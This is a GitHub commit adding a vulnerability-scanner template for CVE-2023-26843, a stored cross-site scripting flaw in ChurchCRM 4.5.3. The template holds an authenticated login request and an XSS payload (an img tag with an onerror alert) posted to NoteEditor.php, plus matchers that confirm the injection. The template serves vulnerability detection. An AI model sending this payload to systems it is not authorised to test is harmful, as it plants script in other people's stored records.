Create CVE-2023-26843.yaml

patch-1
Harsh Yadav 2023-06-25 01:51:22 +05:30 committed by GitHub
parent 1d2c8776a8
commit 2fd0eb8145
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2023-26843
info:
name: ChurchCRM - Stored Cross Site Scripting
author: Harsh
severity: medium
description: |
A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843
- https://nvd.nist.gov/vuln/detail/CVE-2023-26843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-26843
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,churchCRM,stored,xss,authenticated
http:
- raw:
- |
POST /churchcrm/session/begin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
POST /churchcrm/NoteEditor.php?FamilyID=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
PersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "><img src=x onerror=alert(document.domain)>")'
- 'contains(body_2, "ChurchCRM")'
condition: and